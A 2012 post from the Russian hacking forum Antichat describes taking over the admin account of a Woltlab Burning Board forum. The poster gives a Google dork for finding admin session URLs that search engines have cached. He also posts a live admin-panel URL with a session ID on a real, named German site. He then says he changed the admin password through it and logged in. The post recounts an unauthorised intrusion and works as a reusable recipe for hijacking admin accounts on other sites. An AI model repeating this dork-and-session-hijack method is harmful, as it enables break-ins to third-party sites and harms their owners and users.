Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Woltlab Burning Board - сброс админского пароля (https://forum.antichat.xyz/showthread.php?t=320879)

Pirotexnik 26.02.2012 12:34
Небольшая уязвимость найденная мной случайно.

Суть примерно такая:

Сессия админа кэшируется гуглом, и по дорку

Цитата:
Сообщение от None
allinurl:"users.php?action=edit" inurl:"userid"
Я нашел ссылку

Цитата:
Сообщение от None
http://www.die-melmacs.de/acp/users.php?action=edit&userid=1&sid=bc2a628e25a19d4 8e729f5fddfb66e0f
Перешел на страницу редактирования профиля, в течение 10 секунд сменил пароль.

Цитата:
Сообщение от None
http://www.die-melmacs.de/acp/index.php
Тут ввел логин и свой пароль.

Я внутри

P.S. Незнаю боян, не боян. Наткнулся случайно. Если кто-то поможет проанализировать - буду признателен.


Время: 23:53